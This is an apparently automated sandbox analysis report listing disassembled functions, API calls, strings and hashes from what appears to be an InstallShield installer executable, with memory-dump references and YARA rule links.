                                                                                                                                                                          • Opcode ID: a941eff0b5c6773db7ac3b96046f7e76ef7878cb4a700490ce39392d411317a2
                                                                                                                                                                          • Instruction ID: 2e2449e36cf8b86f1ff9459b97b83c778f1c9d76b6d9798da2772fc4eecafeee
                                                                                                                                                                          • Opcode Fuzzy Hash: a941eff0b5c6773db7ac3b96046f7e76ef7878cb4a700490ce39392d411317a2
                                                                                                                                                                          • Instruction Fuzzy Hash: 61119031900218EECB14EBA1CD51BEDB7B8AF51304F54419EF445B71C1EBB81B49CB5A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004114B9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_
                                                                                                                                                                          • String ID: HsG$CJ
                                                                                                                                                                          • API String ID: 2427045233-3544447196
                                                                                                                                                                          • Opcode ID: a328c0e021524afa007cb81a0d81fc5d8c9761823f3e3936ed1cc68449b318f0
                                                                                                                                                                          • Instruction ID: ccd138e4788acbd0c55a2f10029d123d2c5930a593a5d8d2dc7e82ab92524f58
                                                                                                                                                                          • Opcode Fuzzy Hash: a328c0e021524afa007cb81a0d81fc5d8c9761823f3e3936ed1cc68449b318f0
                                                                                                                                                                          • Instruction Fuzzy Hash: 21117F71900208EBCB14EBB5C951ADDB7B8AF08304F20416FE516F7282EB786A49CF58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00435045, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043504C
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFreeLastString$H_prolog3_
                                                                                                                                                                          • String ID: 0x%04x.ini$HsG
                                                                                                                                                                          • API String ID: 1415129594-4051447474
                                                                                                                                                                          • Opcode ID: af78edecdee6240305009839576aa9c9a9ac0d6df1a61d5021288a6bf0df5a8b
                                                                                                                                                                          • Instruction ID: 1d05c432303de26f5731d90a79c38d214681b33e462660029db24995c23e43c6
                                                                                                                                                                          • Opcode Fuzzy Hash: af78edecdee6240305009839576aa9c9a9ac0d6df1a61d5021288a6bf0df5a8b
                                                                                                                                                                          • Instruction Fuzzy Hash: 0F116030900208EBDB14EB95CC86AEDB7B8BF08354F64412AF515B71D1EB79AD06CB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004362A7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004362AE
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
                                                                                                                                                                            • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
                                                                                                                                                                            • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastString$AllocH_prolog3H_prolog3_
                                                                                                                                                                          • String ID: HsG$VersionString
                                                                                                                                                                          • API String ID: 3090045046-2849627625
                                                                                                                                                                          • Opcode ID: 3ce8c0a6c512947abb26bb9a3f6436d17765d7f4305175464d48f25a92aaf9c8
                                                                                                                                                                          • Instruction ID: 815e16bed325f40c300e6663f319c4cd242c3e0954d878af1279e16e1308cd15
                                                                                                                                                                          • Opcode Fuzzy Hash: 3ce8c0a6c512947abb26bb9a3f6436d17765d7f4305175464d48f25a92aaf9c8
                                                                                                                                                                          • Instruction Fuzzy Hash: C3114C71D00208DFDB00EBD0C855BEEBBB4BF14308F04806EE541BB291DBB85A09CB95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00455283, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_catch
                                                                                                                                                                          • String ID: 4$|5H
                                                                                                                                                                          • API String ID: 3886170330-974015250
                                                                                                                                                                          • Opcode ID: 1bf949125347d4d5994c884308f422d03740c438766c9d2b80797010ed7dd3e0
                                                                                                                                                                          • Instruction ID: 0d9e3f98248e1ea46beac7425a14ff0c6a9dc8000d84ebcc099d91e1b70d7464
                                                                                                                                                                          • Opcode Fuzzy Hash: 1bf949125347d4d5994c884308f422d03740c438766c9d2b80797010ed7dd3e0
                                                                                                                                                                          • Instruction Fuzzy Hash: 051170719012059FDB14DF65C99166EBBB0EF84354F20842FF946AB391D638E944CF89
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041C480, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041C48A
                                                                                                                                                                            • Part of subcall function 004113B6: __EH_prolog3.LIBCMT ref: 004113BD
                                                                                                                                                                            • Part of subcall function 004119C2: __EH_prolog3_GS.LIBCMT ref: 004119CC
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 0041C4E6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_$H_prolog3lstrcpy
                                                                                                                                                                          • String ID: |LJ
                                                                                                                                                                          • API String ID: 3469851533-1752162465
                                                                                                                                                                          • Opcode ID: 8f5dbf95b12e509dfaace01ae78478a25fd2ad05233cc46c23c27be335d8590a
                                                                                                                                                                          • Instruction ID: 2c87a07abc69a0e6d05321f2f6b3985f7ae24e0d6bd794c1f80fa9cf6da4315e
                                                                                                                                                                          • Opcode Fuzzy Hash: 8f5dbf95b12e509dfaace01ae78478a25fd2ad05233cc46c23c27be335d8590a
                                                                                                                                                                          • Instruction Fuzzy Hash: 2911CE71640214ABCB10FBA1DC969EE37B6AB98304F4041AFF51A97192DF789E81CB5C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00424DB6, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00424DBD
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00436124: __EH_prolog3_GS.LIBCMT ref: 0043612B
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 004286EB: __EH_prolog3_GS.LIBCMT ref: 004286F5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_$FreeString
                                                                                                                                                                          • String ID: Type$dotnetfx.exe
                                                                                                                                                                          • API String ID: 1274762985-1335848363
                                                                                                                                                                          • Opcode ID: cd217c52dc3861d985e36983301d46a061fb8f2545ab4e867fa8c2a1b8f399c9
                                                                                                                                                                          • Instruction ID: 1b95482946a42471ac1e8c63391098f74d5ec88ddfc0dd1566a08decf3546e59
                                                                                                                                                                          • Opcode Fuzzy Hash: cd217c52dc3861d985e36983301d46a061fb8f2545ab4e867fa8c2a1b8f399c9
                                                                                                                                                                          • Instruction Fuzzy Hash: 1C01C031A00218AAEF14E6A0CC52BED7768BB50354F64402FF501BB1D2EBB94E09CB9D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00423CC9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00423CD3
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 00424D64: __EH_prolog3_GS.LIBCMT ref: 00424D6B
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 00425C00: __EH_prolog3_GS.LIBCMT ref: 00425C07
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_$FreeString$H_prolog3
                                                                                                                                                                          • String ID: HsG$dotnetredistSp3.exe
                                                                                                                                                                          • API String ID: 1949661404-504104211
                                                                                                                                                                          • Opcode ID: c07822fc1006e317cf9623e8ff3dc701a981d7e4c47e5144fd6513e8bce694cd
                                                                                                                                                                          • Instruction ID: aa4ca67da04d656629cb1949c34205e267b425058fa3c847079600a197cd7a7e
                                                                                                                                                                          • Opcode Fuzzy Hash: c07822fc1006e317cf9623e8ff3dc701a981d7e4c47e5144fd6513e8bce694cd
                                                                                                                                                                          • Instruction Fuzzy Hash: 8D116071900218EADB10E6A0CC46BEDB778AB41304F54419EF505B71C2EBB41B09CB9A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00438611, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • This setup was created with a BETA VERSION of %s, xrefs: 00438633
                                                                                                                                                                          • This setup was created with a EVALUATION VERSION of %s, xrefs: 00438673
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_
                                                                                                                                                                          • String ID: This setup was created with a BETA VERSION of %s$ This setup was created with a EVALUATION VERSION of %s
                                                                                                                                                                          • API String ID: 2427045233-3771001655
                                                                                                                                                                          • Opcode ID: e395ea637f5affd3f16115e39a5629235ca78a6aecb7dc9c2c621fbe2bb9f109
                                                                                                                                                                          • Instruction ID: f758eb17bbebab1c8386df697a63ad80202328f38cb4b24be8f50f4f5d6767c1
                                                                                                                                                                          • Opcode Fuzzy Hash: e395ea637f5affd3f16115e39a5629235ca78a6aecb7dc9c2c621fbe2bb9f109
                                                                                                                                                                          • Instruction Fuzzy Hash: D4118E70E40244AEFB14EBA1CC56FACB664AB11714F50815EF051BB1D2DBB85E4AC748
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041F5B5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • {%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}, xrefs: 0041F61F
                                                                                                                                                                          • HsG, xrefs: 0041F5D2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3
                                                                                                                                                                          • String ID: HsG${%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                                                                                                                                                                          • API String ID: 431132790-3319768364
                                                                                                                                                                          • Opcode ID: 84f6f345e858f75e5c36acae00614aa610618de09e8d9a32579aa21ec84722f1
                                                                                                                                                                          • Instruction ID: 80705aca042654855826a4ff0bf7a8cefc4eabf443a8eab813ce61de2f213955
                                                                                                                                                                          • Opcode Fuzzy Hash: 84f6f345e858f75e5c36acae00614aa610618de09e8d9a32579aa21ec84722f1
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A0161A54041946EC7519BA64810B76BAE85B09319F28C09BF598C91C2D67EC643DB68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004556A1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 004556A8
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,00000000,00455C12), ref: 004556C3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFileH_prolog3
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 1973727094-1835203436
                                                                                                                                                                          • Opcode ID: 8bd96244f557586867916141312f895101df79f898f9db972c8c365f0ac0fb61
                                                                                                                                                                          • Instruction ID: bf6b0650f1971f6da1f9d1eda793b6f6164147faaa5151e5c8cb91943a94dc57
                                                                                                                                                                          • Opcode Fuzzy Hash: 8bd96244f557586867916141312f895101df79f898f9db972c8c365f0ac0fb61
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F018FB1500204EBCB00AFB6C89159D3BA8AF04358F90C02FFC0D9F252EB39C649CB99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004217C8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 00421801
                                                                                                                                                                            • Part of subcall function 00440126: lstrcpyW.KERNEL32 ref: 00440164
                                                                                                                                                                            • Part of subcall function 00440126: lstrcpyW.KERNEL32 ref: 0044016C
                                                                                                                                                                            • Part of subcall function 00440126: _malloc.LIBCMT ref: 00440186
                                                                                                                                                                            • Part of subcall function 00440126: _memset.LIBCMT ref: 00440197
                                                                                                                                                                            • Part of subcall function 00440126: _memset.LIBCMT ref: 004401C2
                                                                                                                                                                            • Part of subcall function 00440126: wsprintfW.USER32 ref: 00440214
                                                                                                                                                                            • Part of subcall function 00440126: _memset.LIBCMT ref: 0044022C
                                                                                                                                                                            • Part of subcall function 00440CE4: lstrcpyW.KERNEL32 ref: 00440D1D
                                                                                                                                                                            • Part of subcall function 00440CE4: lstrcpyW.KERNEL32 ref: 00440D27
                                                                                                                                                                            • Part of subcall function 00440CE4: _swscanf.LIBCMT ref: 00440D9C
                                                                                                                                                                            • Part of subcall function 00440CE4: _swscanf.LIBCMT ref: 00440DC5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memsetlstrcpy$_swscanf$_mallocwsprintf
                                                                                                                                                                          • String ID: 4.70.0.1300$WinInet.dll
                                                                                                                                                                          • API String ID: 3061408237-898075288
                                                                                                                                                                          • Opcode ID: f38763ddb3e1ce976c4a695da1c141b0e723f43aad1a6f07aa197f5cc03588d2
                                                                                                                                                                          • Instruction ID: 312feafbbcbf20ec70c1373c4c3f56f602fec0d6eeb8f3adc4a8253bad7f1718
                                                                                                                                                                          • Opcode Fuzzy Hash: f38763ddb3e1ce976c4a695da1c141b0e723f43aad1a6f07aa197f5cc03588d2
                                                                                                                                                                          • Instruction Fuzzy Hash: A7F036B1A0021466E724FB659D46AABB3FCAF85714B00016FF605E2141DA78A945C659
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00436EFC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 00436F28
                                                                                                                                                                            • Part of subcall function 0040D2E5: __EH_prolog3_GS.LIBCMT ref: 0040D2EC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
